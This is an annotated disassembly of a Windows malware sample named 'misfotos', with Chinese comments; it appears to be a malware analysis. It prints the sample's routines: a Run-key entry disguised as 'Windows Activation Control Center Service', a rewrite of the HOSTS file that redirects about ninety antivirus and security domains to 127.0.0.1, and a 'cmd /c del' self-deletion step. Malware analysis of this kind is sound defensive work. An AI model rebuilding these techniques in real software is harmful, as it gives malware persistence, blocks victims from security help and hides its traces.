00402D0A E8 61060000    CALL misfotos.00403370                ; 在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站.
00402D0F E8 F9120000    CALL misfotos.0040400D                ; 安装程序关闭退出，并执行自我删除操作.
00402D14 FF15 88804000 CALL DWORD PTR DS:[408088]             ; ntdll.RtlGetLastWin32Error(如果s2 == s1,则该病毒程序从这里开始执行恶意操作.)
----------------------------------------------------------
在注册表中添加病毒启动项：
00404170 55             PUSH EBP
00404171 8BEC          MOV EBP,ESP
00404173 81EC 8C000000 SUB ESP,8C
00404179 6A 00          PUSH 0
0040417B 8D45 FC       LEA EAX,DWORD PTR SS:[EBP-4]
0040417E 50             PUSH EAX
0040417F 6A 00          PUSH 0
00404181 68 3F000F00    PUSH 0F003F
00404186 6A 00          PUSH 0
00404188 6A 00          PUSH 0
0040418A 6A 00          PUSH 0
0040418C 68 CAFEBB29    PUSH 29BBFECA
00404191 8D4D CC       LEA ECX,DWORD PTR SS:[EBP-34]
00404194 E8 4C060000    CALL misfotos.004047E5                ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00404199 50             PUSH EAX                               ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040419A 68 02000080    PUSH 80000002
0040419F FF15 08804000 CALL DWORD PTR DS:[408008]             ; ADVAPI32.RegCreateKeyExA(hKey = HKEY_LOCAL_MACHINE).
004041A5 8D4D CC       LEA ECX,DWORD PTR SS:[EBP-34]
004041A8 E8 08010000    CALL misfotos.004042B5                ; 清除内存数据.
004041AD 837D 08 00    CMP DWORD PTR SS:[EBP+8],0
004041B1 74 32          JE SHORT misfotos.004041E5
004041B3 FF75 08       PUSH DWORD PTR SS:[EBP+8]             ; String = "waccs.exe"
004041B6 FF15 D8804000 CALL DWORD PTR DS:[4080D8]             ; kernel32.lstrlenA
004041BC 50             PUSH EAX
004041BD FF75 08       PUSH DWORD PTR SS:[EBP+8]
004041C0 6A 01          PUSH 1
004041C2 6A 00          PUSH 0
004041C4 68 4E9127A1    PUSH A127914E
004041C9 8D4D A0       LEA ECX,DWORD PTR SS:[EBP-60]
004041CC E8 74060000    CALL misfotos.00404845                ; ASCII "Windows Activation Control Center Service"
004041D1 50             PUSH EAX                               ; ASCII "Windows Activation Control Center Service"
004041D2 FF75 FC       PUSH DWORD PTR SS:[EBP-4]
004041D5 FF15 04804000 CALL DWORD PTR DS:[408004]             ; ADVAPI32.RegSetValueExA
004041DB 8D4D A0       LEA ECX,DWORD PTR SS:[EBP-60]
004041DE E8 FA000000    CALL misfotos.004042DD                ; 清除内存数据.
004041E3 EB 25          JMP SHORT misfotos.0040420A
004041E5 68 7A9127A1    PUSH A127917A
004041EA 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
004041F0 E8 50060000    CALL misfotos.00404845                ; 清除内存数据.
004041F5 50             PUSH EAX
004041F6 FF75 FC       PUSH DWORD PTR SS:[EBP-4]
004041F9 FF15 00804000 CALL DWORD PTR DS:[408000]             ; ADVAPI32.RegDeleteValueA
004041FF 8D8D 74FFFFFF LEA ECX,DWORD PTR SS:[EBP-8C]
00404205 E8 D3000000    CALL misfotos.004042DD                ; 清除内存数据.
0040420A FF75 FC       PUSH DWORD PTR SS:[EBP-4]
0040420D FF15 18804000 CALL DWORD PTR DS:[408018]             ; ADVAPI32.RegCloseKey
00404213 C9             LEAVE
00404214 C3             RETN                                  ; 返回.

在HOSTS域名映像劫持文件中添加N个安全网站域名地址,不让用户访问这些网站：
00403370 55             PUSH EBP
00403371 8BEC          MOV EBP,ESP
00403373 81EC E0030000 SUB ESP,3E0
00403379 68 04010000    PUSH 104
0040337E 6A 00          PUSH 0
00403380 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
00403386 50             PUSH EAX
00403387 E8 AE3C0000    CALL misfotos.0040703A                ; JMP 到 msvcrt.memset
0040338C 83C4 0C       ADD ESP,0C
0040338F 68 04010000    PUSH 104
00403394 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
0040339A 50             PUSH EAX
0040339B FF15 94804000 CALL DWORD PTR DS:[408094]             ; kernel32.GetSystemDirectoryA(获取系统SYSTEM32文件夹路径名).
004033A1 68 04010000    PUSH 104
004033A6 68 E6430183    PUSH 830143E6
004033AB 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033B1 E8 4F0F0000    CALL misfotos.00404305                ; ASCII "\drivers\etc\hosts"
004033B6 50             PUSH EAX                               ; ASCII "\drivers\etc\hosts"
004033B7 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033BD 50             PUSH EAX                               ; ASCII "C:\WINDOWS\system32"
004033BE E8 6B3C0000    CALL misfotos.0040702E                ; JMP 到 msvcrt.strncat(ASCII "C:\WINDOWS\system32\drivers\etc\hosts").
004033C3 83C4 0C       ADD ESP,0C
004033C6 8D8D A0FCFFFF LEA ECX,DWORD PTR SS:[EBP-360]
004033CC E8 C5EAFFFF    CALL misfotos.00401E96                ; 清除内存数据.
004033D1 68 38924000    PUSH misfotos.00409238                ; /mode = "w"
004033D6 8D85 B4FCFFFF LEA EAX,DWORD PTR SS:[EBP-34C]
004033DC 50             PUSH EAX                               ; |path = "C:\WINDOWS\system32\drivers\etc\hosts"
004033DD E8 D83C0000    CALL misfotos.004070BA                ; JMP 到 msvcrt.fopen(打开HOSTS域名映像劫持文件)
004033E2 59             POP ECX
004033E3 59             POP ECX
004033E4 8985 B8FDFFFF MOV DWORD PTR SS:[EBP-248],EAX
004033EA 83BD B8FDFFFF 0>CMP DWORD PTR SS:[EBP-248],0
004033F1 75 07          JNZ SHORT misfotos.004033FA
004033F3 32C0          XOR AL,AL
004033F5 E9 18060000    JMP misfotos.00403A12
004033FA 68 AF305D14    PUSH 145D30AF
004033FF 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
00403405 E8 5B0F0000    CALL misfotos.00404365                ; ASCII "# Copyright (c) 1993-1999 Microsoft Corp.
#
"
0040340A 50             PUSH EAX                               ; /format = "# Copyright (c) 1993-1999 Microsoft Corp.
#
"
0040340B FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]             ; |stream = msvcrt.77C2FCE0
00403411 E8 9E3C0000    CALL misfotos.004070B4                ; JMP 到 msvcrt.fprintf
00403416 59             POP ECX
00403417 59             POP ECX
00403418 8D8D 70FCFFFF LEA ECX,DWORD PTR SS:[EBP-390]
0040341E E8 F20D0000    CALL misfotos.00404215                ; 清除内存数据.
00403423 68 981A4325    PUSH 25431A98
00403428 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
0040342E E8 920F0000    CALL misfotos.004043C5                ; ASCII "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.
#

"
00403433 50             PUSH EAX                               ; /format = "# This is a sample LMHOSTS file used by the Microsoft TCP/IP for Windows.
#

"
00403434 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]             ; |stream = msvcrt.77C2FCE0
0040343A E8 753C0000    CALL misfotos.004070B4                ; JMP 到 msvcrt.fprintf
0040343F 59             POP ECX
00403440 59             POP ECX
00403441 8D8D 20FCFFFF LEA ECX,DWORD PTR SS:[EBP-3E0]
00403447 E8 F10D0000    CALL misfotos.0040423D                ; 清除内存数据.
0040344C C785 C0FDFFFF B>MOV DWORD PTR SS:[EBP-240],misfotos.0040>; merijn.org
00403456 C785 C4FDFFFF C>MOV DWORD PTR SS:[EBP-23C],misfotos.0040>; www.merijn.org
00403460 C785 C8FDFFFF D>MOV DWORD PTR SS:[EBP-238],misfotos.0040>; www.spywareinfo.comspywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
0040346A C785 CCFDFFFF E>MOV DWORD PTR SS:[EBP-234],misfotos.0040>; spywareinfo.comwww.spybot.infospybot.infowww.viruslist.com
00403474 C785 D0FDFFFF F>MOV DWORD PTR SS:[EBP-230],misfotos.0040>; www.spybot.infospybot.infowww.viruslist.com
0040347E C785 D4FDFFFF 0>MOV DWORD PTR SS:[EBP-22C],misfotos.0040>; spybot.infowww.viruslist.com
00403488 C785 D8FDFFFF 1>MOV DWORD PTR SS:[EBP-228],misfotos.0040>; www.viruslist.com
00403492 C785 DCFDFFFF 2>MOV DWORD PTR SS:[EBP-224],misfotos.0040>; viruslist.com
0040349C C785 E0FDFFFF 3>MOV DWORD PTR SS:[EBP-220],misfotos.0040>; www.hijackthis.de
004034A6 C785 E4FDFFFF 5>MOV DWORD PTR SS:[EBP-21C],misfotos.0040>; hijackthis.de
004034B0 C785 E8FDFFFF 6>MOV DWORD PTR SS:[EBP-218],misfotos.0040>; www.majorgeeks.com
004034BA C785 ECFDFFFF 7>MOV DWORD PTR SS:[EBP-214],misfotos.0040>; majorgeeks.com
004034C4 C785 F0FDFFFF 8>MOV DWORD PTR SS:[EBP-210],misfotos.0040>; www.virustotal.com
004034CE C785 F4FDFFFF 9>MOV DWORD PTR SS:[EBP-20C],misfotos.0040>; virustotal.com
004034D8 C785 F8FDFFFF A>MOV DWORD PTR SS:[EBP-208],misfotos.0040>; kaspersky.com
004034E2 C785 FCFDFFFF B>MOV DWORD PTR SS:[EBP-204],misfotos.0040>; kaspersky-labs.com
004034EC C785 00FEFFFF C>MOV DWORD PTR SS:[EBP-200],misfotos.0040>; www.kaspersky.com
004034F6 C785 04FEFFFF E>MOV DWORD PTR SS:[EBP-1FC],misfotos.0040>; www.sophos.com
00403500 C785 08FEFFFF F>MOV DWORD PTR SS:[EBP-1F8],misfotos.0040>; sophos
0040350A C785 0CFEFFFF F>MOV DWORD PTR SS:[EBP-1F4],misfotos.0040>; securityresponse.symantec.com
00403514 C785 10FEFFFF 1>MOV DWORD PTR SS:[EBP-1F0],misfotos.0040>; symantec.com
0040351E C785 14FEFFFF 2>MOV DWORD PTR SS:[EBP-1EC],misfotos.0040>; www.symantec.com
00403528 C785 18FEFFFF 3>MOV DWORD PTR SS:[EBP-1E8],misfotos.0040>; updates.symantec.com
00403532 C785 1CFEFFFF 5>MOV DWORD PTR SS:[EBP-1E4],misfotos.0040>; liveupdate.symantecliveupdate.com
0040353C C785 20FEFFFF 7>MOV DWORD PTR SS:[EBP-1E0],misfotos.0040>; liveupdate.symantec.comcustomer.symantec.com
00403546 C785 24FEFFFF 9>MOV DWORD PTR SS:[EBP-1DC],misfotos.0040>; customer.symantec.com
00403550 C785 28FEFFFF A>MOV DWORD PTR SS:[EBP-1D8],misfotos.0040>; update.symantec.comwww.mcafee.com
0040355A C785 2CFEFFFF B>MOV DWORD PTR SS:[EBP-1D4],misfotos.0040>; www.mcafee.com
00403564 C785 30FEFFFF C>MOV DWORD PTR SS:[EBP-1D0],misfotos.0040>; mcafee.com
0040356E C785 34FEFFFF D>MOV DWORD PTR SS:[EBP-1CC],misfotos.0040>; rads.mcafee.commast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403578 C785 38FEFFFF E>MOV DWORD PTR SS:[EBP-1C8],misfotos.0040>; mast.mcafee.comdownload.mcafee.comdispatch.mcafee.comus.mcafee.com
00403582 C785 3CFEFFFF F>MOV DWORD PTR SS:[EBP-1C4],misfotos.0040>; download.mcafee.comdispatch.mcafee.comus.mcafee.com
0040358C C785 40FEFFFF 0>MOV DWORD PTR SS:[EBP-1C0],misfotos.0040>; dispatch.mcafee.comus.mcafee.com
00403596 C785 44FEFFFF 2>MOV DWORD PTR SS:[EBP-1BC],misfotos.0040>; us.mcafee.com
004035A0 C785 48FEFFFF 3>MOV DWORD PTR SS:[EBP-1B8],misfotos.0040>; www.trendsecure.comtrendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035AA C785 4CFEFFFF 4>MOV DWORD PTR SS:[EBP-1B4],misfotos.0040>; trendsecure.comwww.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035B4 C785 50FEFFFF 5>MOV DWORD PTR SS:[EBP-1B0],misfotos.0040>; www.avp.comavp.comanalysis.seclab.tuwien.ac.at
004035BE C785 54FEFFFF 6>MOV DWORD PTR SS:[EBP-1AC],misfotos.0040>; avp.comanalysis.seclab.tuwien.ac.at
004035C8 C785 58FEFFFF 6>MOV DWORD PTR SS:[EBP-1A8],misfotos.0040>; analysis.seclab.tuwien.ac.at
004035D2 C785 5CFEFFFF 8>MOV DWORD PTR SS:[EBP-1A4],misfotos.0040>; www.bleepingcomputer.com
004035DC C785 60FEFFFF A>MOV DWORD PTR SS:[EBP-1A0],misfotos.0040>; bleepingcomputer.com
004035E6 C785 64FEFFFF B>MOV DWORD PTR SS:[EBP-19C],misfotos.0040>; guru0.grisoft.cz
004035F0 C785 68FEFFFF D>MOV DWORD PTR SS:[EBP-198],misfotos.0040>; guru1.grisoft.cz
004035FA C785 6CFEFFFF E>MOV DWORD PTR SS:[EBP-194],misfotos.0040>; guru2.grisoft.cz
00403604 C785 70FEFFFF F>MOV DWORD PTR SS:[EBP-190],misfotos.0040>; guru3.grisoft.cz
0040360E C785 74FEFFFF 0>MOV DWORD PTR SS:[EBP-18C],misfotos.0040>; guru4.grisoft.cz
00403618 C785 78FEFFFF 2>MOV DWORD PTR SS:[EBP-188],misfotos.0040>; guru5.grisoft.cz
00403622 C785 7CFEFFFF 3>MOV DWORD PTR SS:[EBP-184],misfotos.0040>; download.f-secure.com
0040362C C785 80FEFFFF 4>MOV DWORD PTR SS:[EBP-180],misfotos.0040>; www.download.f-secure.com
00403636 C785 84FEFFFF 6>MOV DWORD PTR SS:[EBP-17C],misfotos.0040>; avg-antivirus.net
00403640 C785 88FEFFFF 7>MOV DWORD PTR SS:[EBP-178],misfotos.0040>; www.avg-antivirus.net
0040364A C785 8CFEFFFF 9>MOV DWORD PTR SS:[EBP-174],misfotos.0040>; f-secure.com
00403654 C785 90FEFFFF A>MOV DWORD PTR SS:[EBP-170],misfotos.0040>; www.f-secure.com
0040365E C785 94FEFFFF B>MOV DWORD PTR SS:[EBP-16C],misfotos.0040>; free.grisoft.com
00403668 C785 98FEFFFF C>MOV DWORD PTR SS:[EBP-168],misfotos.0040>; www.free.grisoft.com
00403672 C785 9CFEFFFF E>MOV DWORD PTR SS:[EBP-164],misfotos.0040>; free.avg.com
0040367C C785 A0FEFFFF F>MOV DWORD PTR SS:[EBP-160],misfotos.0040>; www.free.avg.com
00403686 C785 A4FEFFFF 0>MOV DWORD PTR SS:[EBP-15C],misfotos.0040>; avast.com
00403690 C785 A8FEFFFF 1>MOV DWORD PTR SS:[EBP-158],misfotos.0040>; www.avast.com
0040369A C785 ACFEFFFF 2>MOV DWORD PTR SS:[EBP-154],misfotos.0040>; onlinescan.avast.com
004036A4 C785 B0FEFFFF 3>MOV DWORD PTR SS:[EBP-150],misfotos.0040>; www.onlinescan.avast.com
004036AE C785 B4FEFFFF 5>MOV DWORD PTR SS:[EBP-14C],misfotos.0040>; housecall.trendmicro.com
004036B8 C785 B8FEFFFF 7>MOV DWORD PTR SS:[EBP-148],misfotos.0040>; www.housecall.trendmicro.com
004036C2 C785 BCFEFFFF 9>MOV DWORD PTR SS:[EBP-144],misfotos.0040>; free.avg.com
004036CC C785 C0FEFFFF A>MOV DWORD PTR SS:[EBP-140],misfotos.0040>; www.free.avg.com
004036D6 C785 C4FEFFFF B>MOV DWORD PTR SS:[EBP-13C],misfotos.0040>; bitdefender.comwww.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036E0 C785 C8FEFFFF C>MOV DWORD PTR SS:[EBP-138],misfotos.0040>; www.bitdefender.comtrendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036EA C785 CCFEFFFF D>MOV DWORD PTR SS:[EBP-134],misfotos.0040>; trendsecure.comwww.trendsecure.comfuturenow.bitdefender.com
004036F4 C785 D0FEFFFF E>MOV DWORD PTR SS:[EBP-130],misfotos.0040>; www.trendsecure.comfuturenow.bitdefender.com
004036FE C785 D4FEFFFF 0>MOV DWORD PTR SS:[EBP-12C],misfotos.0040>; futurenow.bitdefender.com
00403708 C785 D8FEFFFF 1>MOV DWORD PTR SS:[EBP-128],misfotos.0040>; www.futurenow.bitdefender.com
00403712 C785 DCFEFFFF 3>MOV DWORD PTR SS:[EBP-124],misfotos.0040>; f-prot.com
0040371C C785 E0FEFFFF 4>MOV DWORD PTR SS:[EBP-120],misfotos.0040>; www.f-prot.com
00403726 C785 E4FEFFFF 5>MOV DWORD PTR SS:[EBP-11C],misfotos.0040>; eset.com
00403730 C785 E8FEFFFF 6>MOV DWORD PTR SS:[EBP-118],misfotos.0040>; www.eset.com
0040373A C785 ECFEFFFF 7>MOV DWORD PTR SS:[EBP-114],misfotos.0040>; free-av.comwww.free-av.comavira.com
00403744 C785 F0FEFFFF 8>MOV DWORD PTR SS:[EBP-110],misfotos.0040>; www.free-av.comavira.com
0040374E C785 F4FEFFFF 9>MOV DWORD PTR SS:[EBP-10C],misfotos.0040>; avira.com
00403758 C785 F8FEFFFF 9>MOV DWORD PTR SS:[EBP-108],misfotos.0040>; www.avira.com
00403762 C785 FCFEFFFF A>MOV DWORD PTR SS:[EBP-104],misfotos.0040>; free.avg.com
0040376C C785 00FFFFFF B>MOV DWORD PTR SS:[EBP-100],misfotos.0040>; www.free.avg.com
00403776 C785 04FFFFFF D>MOV DWORD PTR SS:[EBP-FC],misfotos.00409>; antivir.es
00403780 C785 08FFFFFF D>MOV DWORD PTR SS:[EBP-F8],misfotos.00409>; www.antivir.es
0040378A C785 0CFFFFFF E>MOV DWORD PTR SS:[EBP-F4],misfotos.00409>; ikarus.net
00403794 C785 10FFFFFF F>MOV DWORD PTR SS:[EBP-F0],misfotos.00409>; www.ikarus.net
0040379E C785 14FFFFFF 0>MOV DWORD PTR SS:[EBP-EC],misfotos.00409>; prevx.com
004037A8 C785 18FFFFFF 1>MOV DWORD PTR SS:[EBP-E8],misfotos.00409>; www.prevx.com
004037B2 C785 1CFFFFFF 2>MOV DWORD PTR SS:[EBP-E4],misfotos.00409>; 2-spyware.com
004037BC C785 20FFFFFF 3>MOV DWORD PTR SS:[EBP-E0],misfotos.00409>; www.2-spyware.com
004037C6 C785 24FFFFFF 4>MOV DWORD PTR SS:[EBP-DC],misfotos.00409>; castlecops.com
004037D0 C785 28FFFFFF 5>MOV DWORD PTR SS:[EBP-D8],misfotos.00409>; www.castlecops.com
004037DA C785 2CFFFFFF 6>MOV DWORD PTR SS:[EBP-D4],misfotos.00409>; virusinfo.prevx.comwww.virusinfo.prevx.comforums.majorgeeks.com
004037E4 C785 30FFFFFF 8>MOV DWORD PTR SS:[EBP-D0],misfotos.00409>; www.virusinfo.prevx.comforums.majorgeeks.com
004037EE C785 34FFFFFF 9>MOV DWORD PTR SS:[EBP-CC],misfotos.00409>; forums.majorgeeks.com
004037F8 C785 38FFFFFF B>MOV DWORD PTR SS:[EBP-C8],misfotos.00409>; www.forums.majorgeeks.com
00403802 C785 3CFFFFFF C>MOV DWORD PTR SS:[EBP-C4],misfotos.00409>; eradicatespyware.net
0040380C C785 40FFFFFF E>MOV DWORD PTR SS:[EBP-C0],misfotos.00409>; www.eradicatespyware.net
00403816 C785 44FFFFFF 0>MOV DWORD PTR SS:[EBP-BC],misfotos.00409>; fortinet.com
00403820 C785 48FFFFFF 1>MOV DWORD PTR SS:[EBP-B8],misfotos.00409>; www.fortinet.com
0040382A C785 4CFFFFFF 2>MOV DWORD PTR SS:[EBP-B4],misfotos.00409>; fortiguardcenter.com
00403834 C785 50FFFFFF 3>MOV DWORD PTR SS:[EBP-B0],misfotos.00409>; www.fortiguardcenter.com
0040383E C785 54FFFFFF 5>MOV DWORD PTR SS:[EBP-AC],misfotos.00409>; trendmicro.com
00403848 C785 58FFFFFF 6>MOV DWORD PTR SS:[EBP-A8],misfotos.00409>; www.trendmicro.com
00403852 C785 5CFFFFFF 7>MOV DWORD PTR SS:[EBP-A4],misfotos.00409>; www.safer-networking.org
0040385C C785 60FFFFFF 9>MOV DWORD PTR SS:[EBP-A0],misfotos.00409>; safer-networking.org
00403866 C785 64FFFFFF B>MOV DWORD PTR SS:[EBP-9C],misfotos.00409>; auditmypc.com
00403870 C785 68FFFFFF C>MOV DWORD PTR SS:[EBP-98],misfotos.00409>; www.auditmypc.com
0040387A C785 6CFFFFFF D>MOV DWORD PTR SS:[EBP-94],misfotos.00409>; pctools.comwww.pctools.comfirewallguide.com
00403884 C785 70FFFFFF E>MOV DWORD PTR SS:[EBP-90],misfotos.00409>; www.pctools.comfirewallguide.com
0040388E C785 74FFFFFF F>MOV DWORD PTR SS:[EBP-8C],misfotos.00409>; firewallguide.com
00403898 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],misfotos.00409>; www.firewallguide.com
004038A2 C785 7CFFFFFF 1>MOV DWORD PTR SS:[EBP-84],misfotos.00409>; spywaredb.com
004038AC C745 80 2C9B400>MOV DWORD PTR SS:[EBP-80],misfotos.00409>; www.spywaredb.com
004038B3 C745 84 409B400>MOV DWORD PTR SS:[EBP-7C],misfotos.00409>; virusspy.com
004038BA C745 88 509B400>MOV DWORD PTR SS:[EBP-78],misfotos.00409>; www.virusspy.com
004038C1 C745 8C 649B400>MOV DWORD PTR SS:[EBP-74],misfotos.00409>; eradicatespyware.net
004038C8 C745 90 7C9B400>MOV DWORD PTR SS:[EBP-70],misfotos.00409>; www.eradicatespyware.net
004038CF C745 94 989B400>MOV DWORD PTR SS:[EBP-6C],misfotos.00409>; spywareterminator.com
004038D6 C745 98 B09B400>MOV DWORD PTR SS:[EBP-68],misfotos.00409>; www.spywareterminator.com
004038DD C745 9C CC9B400>MOV DWORD PTR SS:[EBP-64],misfotos.00409>; freespywareremoval.infowww.freespywareremoval.infoantivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038E4 C745 A0 E49B400>MOV DWORD PTR SS:[EBP-60],misfotos.00409>; www.freespywareremoval.infoantivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038EB C745 A4 009C400>MOV DWORD PTR SS:[EBP-5C],misfotos.00409>; antivirus.about.comwww.antivirus.about.comantivirus.comodo.com
004038F2 C745 A8 149C400>MOV DWORD PTR SS:[EBP-58],misfotos.00409>; www.antivirus.about.comantivirus.comodo.com
004038F9 C745 AC 2C9C400>MOV DWORD PTR SS:[EBP-54],misfotos.00409>; antivirus.comodo.com
00403900 C745 B0 449C400>MOV DWORD PTR SS:[EBP-50],misfotos.00409>; www.antivirus.comodo.com
00403907 C745 B4 609C400>MOV DWORD PTR SS:[EBP-4C],misfotos.00409>; clamav.net
0040390E C745 B8 6C9C400>MOV DWORD PTR SS:[EBP-48],misfotos.00409>; www.clamav.net
00403915 C745 BC 7C9C400>MOV DWORD PTR SS:[EBP-44],misfotos.00409>; pandasecurity.com
0040391C C745 C0 909C400>MOV DWORD PTR SS:[EBP-40],misfotos.00409>; www.pandasecurity.com
00403923 C745 C4 A89C400>MOV DWORD PTR SS:[EBP-3C],misfotos.00409>; clamwin.comwww.clamwin.comshop.symantecstore.com
0040392A C745 C8 B49C400>MOV DWORD PTR SS:[EBP-38],misfotos.00409>; www.clamwin.comshop.symantecstore.com
00403931 C745 CC C49C400>MOV DWORD PTR SS:[EBP-34],misfotos.00409>; shop.symantecstore.com
00403938 C745 D0 DC9C400>MOV DWORD PTR SS:[EBP-30],misfotos.00409>; www.shop.symantecstore.com
0040393F C745 D4 F89C400>MOV DWORD PTR SS:[EBP-2C],misfotos.00409>; shop.ca.comwww.shop.ca.comca.com
00403946 C745 D8 049D400>MOV DWORD PTR SS:[EBP-28],misfotos.00409>; www.shop.ca.comca.com
0040394D C745 DC 149D400>MOV DWORD PTR SS:[EBP-24],misfotos.00409>; ca.com
00403954 C745 E0 1C9D400>MOV DWORD PTR SS:[EBP-20],misfotos.00409>; www.ca.com
0040395B C745 E4 289D400>MOV DWORD PTR SS:[EBP-1C],misfotos.00409>; networkworld.com
00403962 C745 E8 3C9D400>MOV DWORD PTR SS:[EBP-18],misfotos.00409>; www.networkworld.com
00403969 C745 EC 549D400>MOV DWORD PTR SS:[EBP-14],misfotos.00409>; norman.com
00403970 C745 F0 609D400>MOV DWORD PTR SS:[EBP-10],misfotos.00409>; www.norman.com
00403977 C745 F4 709D400>MOV DWORD PTR SS:[EBP-C],misfotos.00409D>; grisoft.comwww.grisoft.com\n
0040397E C745 F8 7C9D400>MOV DWORD PTR SS:[EBP-8],misfotos.00409D>; www.grisoft.com\n
00403985 8365 FC 00    AND DWORD PTR SS:[EBP-4],0
00403989 83A5 BCFDFFFF 0>AND DWORD PTR SS:[EBP-244],0
00403990 EB 0D          JMP SHORT misfotos.0040399F
00403992 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
00403998 40             INC EAX
00403999 8985 BCFDFFFF MOV DWORD PTR SS:[EBP-244],EAX
0040399F 83BD BCFDFFFF 5>CMP DWORD PTR SS:[EBP-244],5A
004039A6 7D 14          JGE SHORT misfotos.004039BC
004039A8 68 8C9D4000    PUSH misfotos.00409D8C                ; \n
004039AD FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
004039B3 E8 FC360000    CALL misfotos.004070B4                ; JMP 到 msvcrt.fprintf
004039B8 59             POP ECX
004039B9 59             POP ECX
004039BA  ^ EB D6          JMP SHORT misfotos.00403992             ; 循环插入"\n".
004039BC 83A5 BCFDFFFF 0>AND DWORD PTR SS:[EBP-244],0
004039C3 EB 0D          JMP SHORT misfotos.004039D2
004039C5 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039CB 40             INC EAX
004039CC 8985 BCFDFFFF MOV DWORD PTR SS:[EBP-244],EAX
004039D2 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039D8 83BC85 C0FDFFFF>CMP DWORD PTR SS:[EBP+EAX*4-240],0
004039E0 74 22          JE SHORT misfotos.00403A04
004039E2 8B85 BCFDFFFF MOV EAX,DWORD PTR SS:[EBP-244]
004039E8 FFB485 C0FDFFFF PUSH DWORD PTR SS:[EBP+EAX*4-240]
004039EF 68 909D4000    PUSH misfotos.00409D90                ; 127.0.0.1\t%s\n
004039F4 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
004039FA E8 B5360000    CALL misfotos.004070B4                ; JMP 到 msvcrt.fprintf
004039FF 83C4 0C       ADD ESP,0C
00403A02  ^ EB C1          JMP SHORT misfotos.004039C5             ; 循环插入"127.0.0.1\t%s\n".
00403A04 FFB5 B8FDFFFF PUSH DWORD PTR SS:[EBP-248]
00403A0A E8 9F360000    CALL misfotos.004070AE                ; JMP 到 msvcrt.fclose(关闭HOSTS域名映像劫持文件)
00403A0F 59             POP ECX
00403A10 B0 01          MOV AL,1
00403A12 C9             LEAVE
00403A13 C3             RETN                                  ; 返回.

安装程序关闭退出，并执行自我删除操作：
0040400D 55             PUSH EBP
0040400E 8BEC          MOV EBP,ESP
00404010 81EC 48030000 SUB ESP,348
00404016 68 04010000    PUSH 104
0040401B 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404021 50             PUSH EAX
00404022 6A 00          PUSH 0
00404024 FF15 9C804000 CALL DWORD PTR DS:[40809C]             ; kernel32.GetModuleHandleA
0040402A 50             PUSH EAX
0040402B FF15 98804000 CALL DWORD PTR DS:[408098]             ; kernel32.GetModuleFileNameA(获取程序自身当前路径名).
00404031 68 04010000    PUSH 104
00404036 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040403C 50             PUSH EAX
0040403D 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404043 50             PUSH EAX
00404044 FF15 D4804000 CALL DWORD PTR DS:[4080D4]             ; kernel32.GetShortPathNameA(将Windows中的长文件名转换为DOS下的短文件名).
0040404A 68 04010000    PUSH 104
0040404F 8D85 B8FCFFFF LEA EAX,DWORD PTR SS:[EBP-348]
00404055 50             PUSH EAX
00404056 68 389E4000    PUSH misfotos.00409E38                ; comspec/c del  > nul
0040405B FF15 D0804000 CALL DWORD PTR DS:[4080D0]             ; kernel32.GetEnvironmentVariableA
00404061 6A 04          PUSH 4
00404063 6A 00          PUSH 0
00404065 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
0040406B 50             PUSH EAX                               ; "C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
0040406C FF15 CC804000 CALL DWORD PTR DS:[4080CC]             ; kernel32.MoveFileExA
00404072 68 04010000    PUSH 104
00404077 68 409E4000    PUSH misfotos.00409E40                ; /c del  > nul
0040407C 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
00404082 50             PUSH EAX
00404083 E8 14300000    CALL misfotos.0040709C                ; JMP 到 msvcrt.strncpy
00404088 83C4 0C       ADD ESP,0C
0040408B 68 04010000    PUSH 104                               ; /maxlen = 104 (260.)
00404090 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00404096 50             PUSH EAX                               ; |src = "C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
00404097 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
0040409D 50             PUSH EAX                               ; |dest = "/c del "
0040409E E8 8B2F0000    CALL misfotos.0040702E                ; JMP 到 msvcrt.strncat
004040A3 83C4 0C       ADD ESP,0C
004040A6 68 04010000    PUSH 104                                  /maxlen = 104 (260.)
004040AB 68 489E4000    PUSH misfotos.00409E48                ; |src = " > nul"
004040B0 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208]
004040B6 50             PUSH EAX                               ; |dest = "/c del C:\DOCUME~1\CODERU~1\桌面\VIRUS.EXE"
004040B7 E8 722F0000    CALL misfotos.0040702E                ; JMP 到 msvcrt.strncat
004040BC 83C4 0C       ADD ESP,0C
